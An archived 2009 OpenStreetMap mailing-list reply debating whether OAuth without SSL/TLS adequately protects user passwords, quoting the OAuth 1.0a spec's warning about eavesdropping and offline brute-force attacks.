[OSM-talk] Why doesn't OSM implement a simple measure to protect it's users and passwords?
Anthony
osm at inbox.org
Sat Dec 26 02:06:45 GMT 2009
On Fri, Dec 25, 2009 at 8:52 PM, Lars Francke <lars.francke at gmail.com>wrote:
> The Resource Owner Authorization[4] as well as the exchange of the
> shared secret will need to be done using a secure method (SSL/TLS) but
> that doesn't mean that OAuth 1.0a or OAuth WRAP aren't valid
> authentication/authorization mechanisms. It just means that there is a
> way to implement it in an insecure way.
>
Okay, but isn't OAuth being presented as an alternative to SSL?
What I got from a quick read of the spec (http://oauth.net/core/1.0a/) is
this: "Unless a transport-layer security protocol is used, eavesdroppers
will have full access to OAuth requests and signatures, and will thus be
able to mount offline brute-force attacks to recover the Consumer's
credentials used."
I'd imagine a large number of OSM passwords can be easily brute forced given
offline access.
Not that I think it much matters. I agree with Steve that stealing OSM
passwords isn't that big of a deal.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.openstreetmap.org/pipermail/talk/attachments/20091225/f19d31c5/attachment.html>
More information about the talk
mailing list